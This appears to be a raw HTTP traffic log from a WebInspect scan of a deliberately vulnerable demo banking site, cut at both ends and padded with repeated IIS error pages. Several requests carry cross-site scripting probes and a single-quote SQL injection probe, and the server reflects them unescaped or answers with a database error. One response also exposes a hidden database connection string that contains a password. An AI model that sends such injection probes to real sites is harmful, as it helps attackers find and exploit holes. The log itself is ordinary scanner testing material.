Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /plink.asp?a=b&c=>"'><img%20src="javascript:alert('XSS')"> HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:36:59 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 204 Content-Type: text/html Cache-control: private <html> <body> <P>The parameter "a" = b</P> <P>The parameter "c" = >"'><img src="javascript:alert('XSS')"></P><br> <a href="pindex.asp">Click here to return to index</a> </body> </html>
GET /join.asp?name=&email=</textarea><script>alert('XSS')</script>&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:32 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4014 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
POST /login1.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com Content-Length: 72 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect login=\'&password=333%2D333%2D3333test@test999.com&graphicOption=minimum
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:37:25 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 359 Content-Type: text/html Cache-control: private <font face="Arial" size=2> <p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'user = '\'''.</font> <p> <font face="Arial" size=2>/login1.asp</font><font face="Arial" size=2>, line 10</font>
POST /rootlogin.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com Content-Length: 148 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=1"style="background:url(javascript:alert('XSS'))"%20"
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:37:56 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 127 Content-Type: text/html Cache-control: private <html> <body> Invalid Data 1"style="background:url(javascript:alert('XSS'))" "<br>Please try again. </body> </html>
POST /pformresults.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp.bak Content-Length: 166 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=>"><script>alert("XSS")</script>&txtLastName=Swinney
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:56:59 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 381 Content-Type: text/html Cache-control: private <html> <body> <P>The parameter "txtFirstName" = >"><script>alert("XSS")</script></P> <P>The parameter "txtLastName" = Swinney</P><br> <P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br> <P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br> <a href="pindex.asp">Click here to return to index</a> </body> </html>
POST /pformresults.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp.bak Content-Length: 146 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect txtHidden=This+was+hidden+from+the+user&dbConnectString=1"style="background:url(javascript:alert('XSS'))"%20"&txtFirstName=Joe&txtLastName=Swinney
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:56:57 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 367 Content-Type: text/html Cache-control: private <html> <body> <P>The parameter "txtFirstName" = Joe</P> <P>The parameter "txtLastName" = Swinney</P><br> <P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br> <P>The <b>hidden</b> parameter "dbConnectString" = 1"style="background:url(javascript:alert('XSS'))" "</P><br> <a href="pindex.asp">Click here to return to index</a> </body> </html>
GET /join.asp?name=&email=&surname=&house=1"style="background:url(javascript:alert('XSS'))"%20"&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:24 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4025 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /_vti_cnf/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:26:42 GMT Content-Length: 4214 Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html dir=ltr> <head> <style> a:link {font:8pt/11pt verdana; color:FF0000} a:visited {font:8pt/11pt verdana; color:#4e4e4e} </style> <META NAME="ROBOTS" CONTENT="NOINDEX"> <title>The page cannot be displayed</title> <META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252"> </head> <script> function Homepage(){ <!-- // in real bits, urls get returned to our script like this: // res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm //For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm" DocURL=document.URL; //this is where the http or https will be, as found by searching for :// but skipping the res:// protocolIndex=DocURL.indexOf("://",4); //this finds the ending slash for the domain server serverIndex=DocURL.indexOf("/",protocolIndex + 3); //for the href, we need a valid URL to the domain. We search for the # symbol to find the begining //of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker. //urlresult=DocURL.substring(protocolIndex - 4,serverIndex); BeginURL=DocURL.indexOf("#",1) + 1; urlresult=DocURL.substring(BeginURL,serverIndex); //for display, we need to skip after http://, and go to the next slash displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex); InsertElementAnchor(urlresult, displayresult); } function HtmlEncode(text) { return text.replace(/&/g, '&amp').replace(/'/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;'); } function TagAttrib(name, value) { return ' '+name+'="'+HtmlEncode(value)+'"'; } function PrintTag(tagName, needCloseTag, attrib, inner){ document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) ); if (needCloseTag) document.write( '</' + tagName +'>' ); } function URI(href) { IEVer = window.navigator.appVersion; IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 ); return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ? encodeURI(href) : escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';'); } function InsertElementAnchor(href, text) { PrintTag('A', true, TagAttrib('HREF', URI(href)), text); } //--> </script> <body bgcolor="FFFFFF"> <table width="410" cellpadding="3" cellspacing="5"> <tr> <td align="left" valign="middle" width="360"> <h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1> </td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana"> <hr color="#C0C0C0" noshade> <p>Please try the following:</p> <ul> <li>Open the <script> <!-- if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2"))) { Homepage(); } //--> </script> home page, and then look for links to the information you want.</li> <li>Click the <a href="javascript:location.reload()"> Refresh</a> button, or try again later.<br> </li> </ul> <h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br> Internet Information Services</h2> <hr color="#C0C0C0" noshade> <p>Technical Information (for support personnel)</p> <ul> <p> <li>Background:<br> This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p> <p> <li>More information:<br> <a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a> </li></p> </ul> </font></td> </tr> </table> </body> </html>
GET /linking/link1/link2/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:27 GMT Content-Type: text/html Content-Length: 172 <html><head><title>Directory Listing Denied</title></head> <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>
GET /_vti_txt/DocURL.indexOf( HTTP/1.0 Referer: http://zero.webappsecurity.com:80/_vti_txt/ Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:41:44 GMT Content-Length: 4214 Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html dir=ltr> <head> <style> a:link {font:8pt/11pt verdana; color:FF0000} a:visited {font:8pt/11pt verdana; color:#4e4e4e} </style> <META NAME="ROBOTS" CONTENT="NOINDEX"> <title>The page cannot be displayed</title> <META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252"> </head> <script> function Homepage(){ <!-- // in real bits, urls get returned to our script like this: // res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm //For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm" DocURL=document.URL; //this is where the http or https will be, as found by searching for :// but skipping the res:// protocolIndex=DocURL.indexOf("://",4); //this finds the ending slash for the domain server serverIndex=DocURL.indexOf("/",protocolIndex + 3); //for the href, we need a valid URL to the domain. We search for the # symbol to find the begining //of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker. //urlresult=DocURL.substring(protocolIndex - 4,serverIndex); BeginURL=DocURL.indexOf("#",1) + 1; urlresult=DocURL.substring(BeginURL,serverIndex); //for display, we need to skip after http://, and go to the next slash displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex); InsertElementAnchor(urlresult, displayresult); } function HtmlEncode(text) { return text.replace(/&/g, '&amp').replace(/'/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;'); } function TagAttrib(name, value) { return ' '+name+'="'+HtmlEncode(value)+'"'; } function PrintTag(tagName, needCloseTag, attrib, inner){ document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) ); if (needCloseTag) document.write( '</' + tagName +'>' ); } function URI(href) { IEVer = window.navigator.appVersion; IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 ); return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ? encodeURI(href) : escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';'); } function InsertElementAnchor(href, text) { PrintTag('A', true, TagAttrib('HREF', URI(href)), text); } //--> </script> <body bgcolor="FFFFFF"> <table width="410" cellpadding="3" cellspacing="5"> <tr> <td align="left" valign="middle" width="360"> <h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1> </td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana"> <hr color="#C0C0C0" noshade> <p>Please try the following:</p> <ul> <li>Open the <script> <!-- if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2"))) { Homepage(); } //--> </script> home page, and then look for links to the information you want.</li> <li>Click the <a href="javascript:location.reload()"> Refresh</a> button, or try again later.<br> </li> </ul> <h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br> Internet Information Services</h2> <hr color="#C0C0C0" noshade> <p>Technical Information (for support personnel)</p> <ul> <p> <li>Background:<br> This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p> <p> <li>More information:<br> <a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a> </li></p> </ul> </font></td> </tr> </table> </body> </html>
GET /linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/index.htm HTTP/1.0 Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/index.htm Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:24:25 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:47:11 GMT ETag: "5293b5fea9dc11:8f6" Content-Length: 39 <A HREF="./link13/index.htm">Link13</A>
GET /_vti_log/.FBCIndex HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:49:05 GMT Content-Length: 4214 Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html dir=ltr> <head> <style> a:link {font:8pt/11pt verdana; color:FF0000} a:visited {font:8pt/11pt verdana; color:#4e4e4e} </style> <META NAME="ROBOTS" CONTENT="NOINDEX"> <title>The page cannot be displayed</title> <META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252"> </head> <script> function Homepage(){ <!-- // in real bits, urls get returned to our script like this: // res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm //For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm" DocURL=document.URL; //this is where the http or https will be, as found by searching for :// but skipping the res:// protocolIndex=DocURL.indexOf("://",4); //this finds the ending slash for the domain server serverIndex=DocURL.indexOf("/",protocolIndex + 3); //for the href, we need a valid URL to the domain. We search for the # symbol to find the begining //of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker. //urlresult=DocURL.substring(protocolIndex - 4,serverIndex); BeginURL=DocURL.indexOf("#",1) + 1; urlresult=DocURL.substring(BeginURL,serverIndex); //for display, we need to skip after http://, and go to the next slash displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex); InsertElementAnchor(urlresult, displayresult); } function HtmlEncode(text) { return text.replace(/&/g, '&amp').replace(/'/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;'); } function TagAttrib(name, value) { return ' '+name+'="'+HtmlEncode(value)+'"'; } function PrintTag(tagName, needCloseTag, attrib, inner){ document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) ); if (needCloseTag) document.write( '</' 